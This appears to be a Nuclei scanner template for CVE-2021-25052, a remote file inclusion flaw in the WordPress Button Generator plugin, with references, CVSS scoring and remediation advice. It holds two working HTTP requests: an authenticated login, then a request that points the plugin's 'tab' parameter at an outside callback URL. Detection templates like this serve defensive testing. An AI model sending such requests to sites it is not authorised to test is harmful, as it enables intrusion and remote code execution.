id: CVE-2021-25052 info: name: WordPress Button Generator <2.3.3 - Remote File Inclusion author: cckuailong severity: high description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution. impact: | An attacker can exploit this vulnerability to execute arbitrary code on the target system. remediation: | Update to the latest version of the WordPress Button Generator plugin (2.3.3) to fix the remote file inclusion vulnerability. reference: - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a - https://nvd.nist.gov/vuln/detail/CVE-2021-25052 - https://plugins.trac.wordpress.org/changeset/2641639/button-generation - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-25052 cwe-id: CWE-352 epss-score: 0.01998 epss-percentile: 0.88806 cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: wow-company product: button_generator framework: wordpress tags: cve2021,cve,wp-plugin,authenticated,wpscan,rfi,wp,wordpress,wow-company http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word name: "http" part: interactsh_protocol words: - "http" - type: status status: - 200 # digest: 490a004630440220595e42e9d556d5b860ac2a9bc3207e17f4dc91badec2e2d2b3374b4ff73d4e61022064b3a6f861c7a64d293768a29f0be6f3e0f31b62c158193acd688e52edc00042:922c64590222798bb761d5b6d8e72950